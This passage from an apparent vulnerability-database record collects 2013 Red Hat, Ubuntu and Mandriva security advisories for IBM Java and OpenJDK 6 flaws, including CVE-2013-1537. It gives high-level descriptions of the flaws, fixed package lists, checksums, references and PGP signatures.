CVE-2013-1563,\nCVE-2013-1569, CVE-2013-2383, CVE-2013-2384, CVE-2013-2394, CVE-2013-2417,\nCVE-2013-2418, CVE-2013-2419, CVE-2013-2420, CVE-2013-2422, CVE-2013-2424,\nCVE-2013-2429, CVE-2013-2430, CVE-2013-2432, CVE-2013-2433, CVE-2013-2435,\nCVE-2013-2440)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM Java SE 6 SR13-FP2 release. All running\ninstances of IBM Java must be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/knowledge/articles/11258\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n907589 - CVE-2013-0169 SSL/TLS: CBC padding timing attack (lucky-13)\n920245 - CVE-2013-0401 OpenJDK: sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly invoke the system class loader (CanSecWest 2013, AWT, 8009305)\n920248 - CVE-2013-1491 Oracle JDK: unspecified sanbox bypass (CanSecWest 2013, 2D)\n952387 - CVE-2013-1537 OpenJDK: remote code loading enabled by default (RMI, 8001040)\n952509 - CVE-2013-2424 OpenJDK: MBeanInstantiator insufficient class access checks (JMX, 8006435)\n952521 - CVE-2013-2429 OpenJDK: JPEGImageWriter state corruption (ImageIO, 8007918)\n952524 - CVE-2013-2430 OpenJDK: JPEGImageReader state corruption (ImageIO, 8007667)\n952638 - CVE-2013-2420 OpenJDK: image processing vulnerability (2D, 8007617)\n952642 - CVE-2013-2422 OpenJDK: MethodUtil trampoline class incorrect restrictions (Libraries, 8009857)\n952648 - CVE-2013-1557 OpenJDK: LogStream.setDefaultStream() missing security restrictions (RMI, 8001329)\n952656 - CVE-2013-2419 ICU: Layout Engine font processing errors (JDK 2D, 8001031)\n952657 - CVE-2013-2417 OpenJDK: Network InetAddress serialization information disclosure (Networking, 8000724)\n952708 - CVE-2013-2383 ICU: Layout Engine font layout and glyph table errors (JDK 2D, 8004986)\n952709 - CVE-2013-2384 ICU: Layout Engine font layout and glyph table errors (JDK 2D, 8004987)\n952711 - CVE-2013-1569 ICU: Layout Engine font layout and glyph table errors (JDK 2D, 8004994)\n953166 - CVE-2013-1540 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)\n953172 - CVE-2013-1563 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Install)\n953265 - CVE-2013-2394 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (2D)\n953267 - CVE-2013-2418 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)\n953269 - CVE-2013-2432 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (2D)\n953270 - CVE-2013-2433 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)\n953273 - CVE-2013-2435 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)\n953275 - CVE-2013-2440 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 5):\n\ni386:\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-accessibility-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\n\nx86_64:\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\njava-1.6.0-ibm-accessibility-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\njava-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\n\nRed Hat Enterprise Linux Server Supplementary (v. 5):\n\ni386:\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-accessibility-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\n\nppc:\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.ppc64.rpm\njava-1.6.0-ibm-accessibility-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.ppc64.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.ppc64.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.ppc64.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.ppc64.rpm\njava-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.ppc.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.ppc64.rpm\n\ns390x:\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.s390.rpm\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.s390x.rpm\njava-1.6.0-ibm-accessibility-1.6.0.13.2-1jpp.1.el5_9.s390x.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.s390.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.s390x.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.s390.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.s390x.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.s390.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.s390x.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.s390.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.s390x.rpm\n\nx86_64:\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\njava-1.6.0-ibm-accessibility-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\njava-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.i386.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el5_9.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 6):\n\ni386:\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Supplementary (v. 6):\n\nx86_64:\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Server Supplementary (v. 6):\n\ni386:\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\n\nppc64:\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.ppc64.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.ppc64.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.ppc.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.ppc64.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.ppc64.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.ppc64.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.ppc64.rpm\n\ns390x:\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.s390x.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.s390x.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.s390.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.s390x.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.s390x.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.s390x.rpm\n\nx86_64:\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Supplementary (v. 6):\n\ni386:\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\n\nx86_64:\njava-1.6.0-ibm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-demo-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.i686.rpm\njava-1.6.0-ibm-devel-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-javacomm-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-jdbc-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-plugin-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\njava-1.6.0-ibm-src-1.6.0.13.2-1jpp.1.el6_4.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2013-0169.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0401.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1491.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1537.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1540.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1557.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1563.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-1569.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2383.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2384.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2394.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2417.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2418.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2419.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2420.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2422.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2424.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2429.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2430.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2432.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2433.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2435.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2440.html\nhttps://access.redhat.com/security/updates/classification/#critical\nhttps://www.ibm.com/developerworks/java/jdk/alerts/\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2013 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFRkpsAXlSAg2UNWIIRArHgAJ99lN3GBaglvj3QTq7laft1RtttvQCgglIn\nI8ZMWd5AhLgB1TqY/4MQYM0=\n=wmpI\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ==========================================================================\nUbuntu Security Notice USN-1819-1\nMay 07, 2013\n\nopenjdk-6 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n- Ubuntu 11.10\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in OpenJDK 6. \n\nSoftware Description:\n- openjdk-6: Open Source Java implementation\n\nDetails:\n\nBen Murphy discovered a vulnerability in the OpenJDK JRE related to\ninformation disclosure and data integrity. (CVE-2013-0401)\n\nJames Forshaw discovered a vulnerability in the OpenJDK JRE related to\ninformation disclosure, data integrity and availability. (CVE-2013-1488)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\ninformation disclosure, data integrity and availability. An attacker could\nexploit these to cause a denial of service or expose sensitive data over\nthe network. (CVE-2013-1518, CVE-2013-1537, CVE-2013-1557, CVE-2013-1558,\nCVE-2013-1569, CVE-2013-2383, CVE-2013-2384, CVE-2013-2420, CVE-2013-2421,\nCVE-2013-2422, CVE-2013-2426, CVE-2013-2429, CVE-2013-2430, CVE-2013-2431,\nCVE-2013-2436)\n\nTwo vulnerabilities were discovered in the OpenJDK JRE related to\nconfidentiality. An attacker could exploit these to expose sensitive data\nover the network. (CVE-2013-2415, CVE-2013-2424)\n\nTwo vulnerabilities were discovered in the OpenJDK JRE related to\navailability. An attacker could exploit these to cause a denial of service. \n(CVE-2013-2417, CVE-2013-2419)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n icedtea-6-jre-cacao 6b27-1.12.5-0ubuntu0.12.04.1\n icedtea-6-jre-jamvm 6b27-1.12.5-0ubuntu0.12.04.1\n openjdk-6-jre 6b27-1.12.5-0ubuntu0.12.04.1\n openjdk-6-jre-headless 6b27-1.12.5-0ubuntu0.12.04.1\n openjdk-6-jre-lib 6b27-1.12.5-0ubuntu0.12.04.1\n openjdk-6-jre-zero 6b27-1.12.5-0ubuntu0.12.04.1\n\nUbuntu 11.10:\n icedtea-6-jre-cacao 6b27-1.12.5-0ubuntu0.11.10.1\n icedtea-6-jre-jamvm 6b27-1.12.5-0ubuntu0.11.10.1\n openjdk-6-jre 6b27-1.12.5-0ubuntu0.11.10.1\n openjdk-6-jre-headless 6b27-1.12.5-0ubuntu0.11.10.1\n openjdk-6-jre-lib 6b27-1.12.5-0ubuntu0.11.10.1\n openjdk-6-jre-zero 6b27-1.12.5-0ubuntu0.11.10.1\n\nUbuntu 10.04 LTS:\n icedtea-6-jre-cacao 6b27-1.12.5-0ubuntu0.10.04.1\n openjdk-6-jre 6b27-1.12.5-0ubuntu0.10.04.1\n openjdk-6-jre-headless 6b27-1.12.5-0ubuntu0.10.04.1\n openjdk-6-jre-lib 6b27-1.12.5-0ubuntu0.10.04.1\n openjdk-6-jre-zero 6b27-1.12.5-0ubuntu0.10.04.1\n\nThis update uses a new upstream release, which includes additional bug\nfixes. After a standard system update you need to restart any Java\napplications or applets to make all the necessary changes. An untrusted Java application or applet could possibly\n use these flaws to trigger Java Virtual Machine memory corruption\n (CVE-2013-1569, CVE-2013-2383, CVE-2013-2384). \n \n Multiple improper permission check issues were discovered in the Beans,\n Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java\n application or applet could use these flaws to bypass Java sandbox\n restrictions (CVE-2013-2422, CVE-2013-1518, CVE-2013-1557). \n \n The previous default value of the java.rmi.server.useCodebaseOnly\n property permitted the RMI implementation to automatically load\n classes from remotely specified locations. Note: The\n fix for CVE-2013-1537 changes the default value of the property to\n true, restricting class loading to the local CLASSPATH and locations\n specified in the java.rmi.server.codebase property. \n \n The 2D component did not properly process certain images. An untrusted\n Java application or applet could possibly use this flaw to trigger\n Java Virtual Machine memory corruption (CVE-2013-2420). \n \n It was discovered that the Hotspot component did not properly handle\n certain intrinsic frames, and did not correctly perform access\n checks and MethodHandle lookups. An untrusted Java application or\n applet could use these flaws to bypass Java sandbox restrictions\n (CVE-2013-2431, CVE-2013-2421). \n \n It was discovered that JPEGImageReader and JPEGImageWriter in the\n ImageIO component did not protect against modification of their state\n while performing certain native code operations. An untrusted Java\n application or applet could possibly use these flaws to trigger Java\n Virtual Machine memory corruption (CVE-2013-2429, CVE-2013-2430). \n \n The JDBC driver manager could incorrectly call the toString() method\n in JDBC drivers, and the ConcurrentHashMap class could incorrectly\n call the defaultReadObject() method. An untrusted Java application\n or applet could possibly use these flaws to bypass Java sandbox\n restrictions (CVE-2013-1488, CVE-2013-2426). \n \n The sun.awt.datatransfer.ClassLoaderObjectInputStream class may\n incorrectly invoke the system class loader. An untrusted Java\n application or applet could possibly use this flaw to bypass certain\n Java sandbox restrictions (CVE-2013-0401). \n \n Flaws were discovered in the Network component\u0026#039;s InetAddress\n serialization, and the 2D component\u0026#039;s font handling. An untrusted\n Java application or applet could possibly use these flaws to crash\n the Java Virtual Machine (CVE-2013-2417, CVE-2013-2419). \n \n The MBeanInstantiator class implementation in the OpenJDK JMX component\n did not properly check class access before creating new instances. An\n untrusted Java application or applet could use this flaw to create\n instances of non-public classes (CVE-2013-2424). \n \n It was discovered that JAX-WS could possibly create temporary files\n with insecure permissions. A local attacker could use this flaw\n to access temporary files created by an application using JAX-WS\n (CVE-2013-2415). \n \n The updated packages provides icedtea6-1.11.10 which is not vulnerable\n to these issues. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0401\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1488\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1518\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1537\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1557\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1569\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2383\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2384\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2415\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2417\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2419\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2420\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2421\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2422\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2424\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2426\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2429\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2430\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2431\n http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2013-April/022796.html\n http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html\n https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0124\n https://bugzilla.redhat.com/show_bug.cgi?id=952387\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n 28320f10570a50ac08575480ee249aed mes5/i586/java-1.6.0-openjdk-1.6.0.0-35.b24.5mdvmes5.2.i586.rpm\n 5a6bf000d48cb35a304f9ec7d4f83d6c mes5/i586/java-1.6.0-openjdk-demo-1.6.0.0-35.b24.5mdvmes5.2.i586.rpm\n 966a2d2681441d30ec9d86f3d93c5a32 mes5/i586/java-1.6.0-openjdk-devel-1.6.0.0-35.b24.5mdvmes5.2.i586.rpm\n 280aee290b6d68ab5e994f8a25a50ad9 mes5/i586/java-1.6.0-openjdk-javadoc-1.6.0.0-35.b24.5mdvmes5.2.i586.rpm\n 6893259a988e94df07274bf728cc7675 mes5/i586/java-1.6.0-openjdk-src-1.6.0.0-35.b24.5mdvmes5.2.i586.rpm \n f3d20af548c84815b6c1636273293273 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-35.b24.5mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n 0b253fd82c86e16848eff6d5f9591ce6 mes5/x86_64/java-1.6.0-openjdk-1.6.0.0-35.b24.5mdvmes5.2.x86_64.rpm\n 08d1a5099ab26a89b1dae8008e0d98e6 mes5/x86_64/java-1.6.0-openjdk-demo-1.6.0.0-35.b24.5mdvmes5.2.x86_64.rpm\n c0433e439964af42aa82371901aa07bc mes5/x86_64/java-1.6.0-openjdk-devel-1.6.0.0-35.b24.5mdvmes5.2.x86_64.rpm\n 5e77c039c2d64220d1cf3fce44c86f24 mes5/x86_64/java-1.6.0-openjdk-javadoc-1.6.0.0-35.b24.5mdvmes5.2.x86_64.rpm\n 4dd6c3dbabf6d29cf3ce751bda74f483 mes5/x86_64/java-1.6.0-openjdk-src-1.6.0.0-35.b24.5mdvmes5.2.x86_64.rpm \n f3d20af548c84815b6c1636273293273 mes5/SRPMS/java-1.6.0-openjdk-1.6.0.0-35.b24.5mdvmes5.2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFRcSLkmqjQ0CJFipgRAsEgAJ4gHSUUcP7uDS3JIxzQZxnCLwXe1QCfTQXq\no4NG1rmFdAUfR4q/O/aHdtM=\n=EXuM\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2013-1537" }, { "db": "BID", "id": "59194" }, { "db": "VULMON", "id": "CVE-2013-1537" }, { "db": "PACKETSTORM", "id": "123734" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "121631" }, { "db": "PACKETSTORM", "id": "121703" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "121555" }, { "db": "PACKETSTORM", "id": "121361" } ], "trust": 1.89 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-1537", "trust": 2.7 }, { "db": "BID", "id": "59194", "trust": 2.0 }, { "db": "USCERT", "id": "TA13-107A", "trust": 1.7 }, { "db": "CNNVD", "id": "CNNVD-201304-359", "trust": 0.6 }, { "db": "HITACHI", "id": "HS13-010", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10642", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10627", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-17-213-02", "trust": 0.3 }, { "db": "VULMON", "id": 